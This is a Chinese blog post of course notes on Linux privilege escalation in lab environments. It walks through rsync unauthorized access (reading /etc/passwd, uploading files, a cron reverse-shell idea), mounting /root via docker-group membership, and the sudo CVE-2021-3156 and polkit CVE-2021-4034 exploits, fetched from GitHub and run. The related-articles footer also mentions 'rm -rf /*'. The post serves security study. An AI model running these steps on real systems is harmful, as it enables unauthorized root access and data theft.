第105天:权限提升-Linux 系统&Docker 挂载&Rsync 未授权&Sudo-CVE&Polkit&CVE

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量1k 收藏 8
点赞数 18
文章标签: linux docker 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/139650949
版权

目录

思维导图

案例一:  Linux-Rsync 未授权访问覆盖-本地

案例二:  Linux-Docker 组用户挂载目录-本地

案例三:  Linux-Sudo(CVE-2021-3156)-本地

案例四:Linux-Polkit(CVE-2021-4034)-本地

思维导图

 

案例一:  Linux-Rsync 未授权访问覆盖-本地

rsync 文件传输协议-linux  端口873

配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件

靶场环境:

访问端口

 判断是否有该漏洞的方法:

rsync rsync://123.58.224.8:58515

利用读取文件

rsync rsync://123.58.224.8:58515/src

下载文件  ./ 为当前目录

rsync rsync://123.58.224.8:58515/src/etc/passwd ./

 上传文件

rsync -av passwd rsync://123.58.224.8:58515/src/tmp/passwd

 利用他去反弹shell的思路:利用计时任务

这里由于该靶场为在线靶场,有时间限制,且必须利用公网ip反弹shell,这里利用下面的网址,搭建在线靶场:Vulhub - Docker-Compose file for vulnerability environment

首先把计时任务保存到本地

查看可利用的文件

 必须加执行权限

 把脚本进行上传

 开启监听等待

刚好反弹shell

案例二:  Linux-Docker 组用户挂载目录-本地

首先条件:普通用户在docker组,利用docker服务启动镜像挂载目录
从而来访问root目录、etc目录等敏感文件来进行权限提升。

​环境搭建

useradd -d /home/test -m test  (创建test用户)
passwd test    (修改密码)
usermod -G docker test  (把test用户加入到docker组当中)

利用命令

docker run -v /root:/mnt -it alpine

docker下载alpine镜像,然后利用-v选项把/root目录挂载到docker里面的/mnt目录,-it进入docker,进去以后他会默认你是root用户,你可以去查看/mnt下里面/root的敏感文件

这里我提权拉取了一次所以没有下载过程

root目录直接挂载到了/mnt目录下获得了敏感信息的窃取

不仅可以调用/root,也可以调用其他目录,因为docker命令需要执行下载,等等操作,在这个过程当中本身就是root权限,所以所有目录都可以

案例三:  Linux-Sudo(CVE-2021-3156)-本地

影响版本

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

这台机器正好符合

或者利用   sudoedit -s /  去查看如果有报错那证明有漏洞,没报错证明没有

有漏洞的报错

没有漏洞的报错

可能用到的代码

git clone https://github.com/blasty/CVE-2021-3156.git  #下载
cd CVE-2021-3156
make    #编译
chmod a+x sudo-hax-me-a-sandwich #加执行权限
./sudo-hax-me-a-sandwich 1   #后面的数字1是选择模式

 执行效果

案例四:Linux-Polkit(CVE-2021-4034)-本地

漏洞影响2009年5月至今的所有polkit版本
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

判断

dpkg -l policykit-1

如果是这种信息的话那证明可能可以利用

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034

xiaojiesec
关注
  • 18
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
权限提升——Linux Rsync授权访问&docker挂载&SUDO&Polkit
m0_61506558的博客
01-28 744
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。
105权限提升-Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE
qq_46081990的博客
06-22 353
【代码】第105权限提升-Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE
Linux提权:Docker挂载 && Rsync授权 && Sudo-CVE && Polkit-CVE
qq_61553520的博客
01-28 789
这里的提权手法是需要有一个普通用户的权限,一般情况下取得的webshell权限可能不够。
权限提升Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE
今天是几号的博客
03-05 483
v将容器外部的目录/root(其他目录也可以) 挂载到容器内部/mnt,使用-it参数进入容器shell。如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等。管理员将真实物理机/root目录挂载到容器内部/mnt中,-it参数进入容器shell,补充:拿到普通用户权限后,并且该用户在docker中,意思就是可以控制docker服务。-复现:创建用户归类目录,添加到docker组。sudoedit -s / 报错 则存在。-利用:普通本地用户权限
权限提升-Linux提权-Rsync 授权访问-Docker挂载-sudo权限提升(CVE-2021-3156)-Polkit(CVE-2021-4034)
xiaoheizi的博客
09-04 315
一个综合类探针:一个自动化提权:两个信息收集:两个漏洞探针:二进制文件提权查询:
docker也能提权??内网学习第6 rsync授权访问覆盖 sudo(cve-2021-3156)漏洞提权 polkit漏洞利用
helloKittywz的博客
07-05 416
现在我们来说说liunx提权的操作:前面我们说了环境变量,定时任务来进行提权的操作我们先来说说什么是rsyncrsync是数据备份工具,默认是开启的873端口 我们是使用docker下载镜像文件,什么镜像文件是不重要的,然后将root目录挂载到mnt容器中然后我们就可以在mnt目录中看见与root是一样文件了,你在外部看这个目录是空的。在这里面进行相对应的操作。sudoedit -s / 像下面的这样的话就说明是没有漏洞的如果不是这样的就说明是存在这个漏洞的。我们也可以直接看版本来确定有没有漏洞然后我
Linux提权--准备工作&知识点&工具
金灰的博客
04-28 923
1.提权方法有部分适用在不同环境,当然也有通用方法2.提权方法也有操作系统版本区分,特性决定方法利用面3.提权方法有部分需要特定环境,如数据库,第三方提权等。
小迪安全培训2023期笔记汇总-持续更新
热门推荐
今天是几号的博客
03-03 1万+
基础入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA。基础入门-HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断。信息打点-Web应用&源码泄漏&开源闭源&指纹识别&GIT&SVN&DS&备份。基础入门-ChatGPT篇&注册体验&结合安全&融入技术&高效赋能&拓展需求。信息打点-Web应用&企业产权&指纹识别&域名资产&网络空间&威胁情报。
Linux权限提升总结
m0_66458291的博客
04-01 1271
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。
基于RedHat——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于RedHat系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
基于Ubuntu——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于Ubuntu系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
docker-build-push:Docker Build&Push GitHub操作
05-08
构建一个Docker映像并将其推送到您选择的私有注册表中。 支持的Docker注册表 Docker集线器 Google Container Registry(GCR) AWS Elastic Container Registry(ECR) GitHub Docker注册表 重大变化 如果遇到问题...
exploit-CVE-2016-10033:PHPMailer <5.2.18远程执行代码漏洞和易受攻击的容器
02-01
脆弱的环境要为您的测试设置易受攻击的环境,您将需要安装 ,只需运行以下命令: docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033它将在8080端口上的主机上生成易受攻击的Web应用程序利用要利用此目标,...
symfony-docker:使用Docker的新Symfony应用程序的模板:.install.sh &&:rocket:
02-06
Symfony和Docker 使用Docker的新Symfony应用程序的模板。默认堆栈PHP-FPM NGINX MySQL(开发默认)产品特点sh -c " ./install.sh; curl -I http://localhost:8080 " 裸Symfony默认内置测试和质量保证开箱即用的生产...
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 585
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 4984
Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
60个常见的 Linux 指令
yatingliu的博客
07-25 1311
是 “substitute user” 或 “switch user” 的缩写,它可以让你切换到另一个用户账户,包括 root 用户。是 “manual” 的缩写,通过它你可以访问系统的手册页(manual pages),这些手册页提供了详细的使用说明和参考信息。在一些 Linux 发行版中,adduser 是 useradd 的一个友好封装,功能上类似但提供了更多的默认设置和提示。-f, --force:强制删除,不提示错误信息,即使文件不存在也不会报错。:设置密码过期时间,单位为
【C语言】Linux 飞翔的小鸟
Minuhy
07-22 814
Linux下运行的,用C语言编写的飞翔的小鸟,一款挺无聊的小游戏,分享给大家~
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值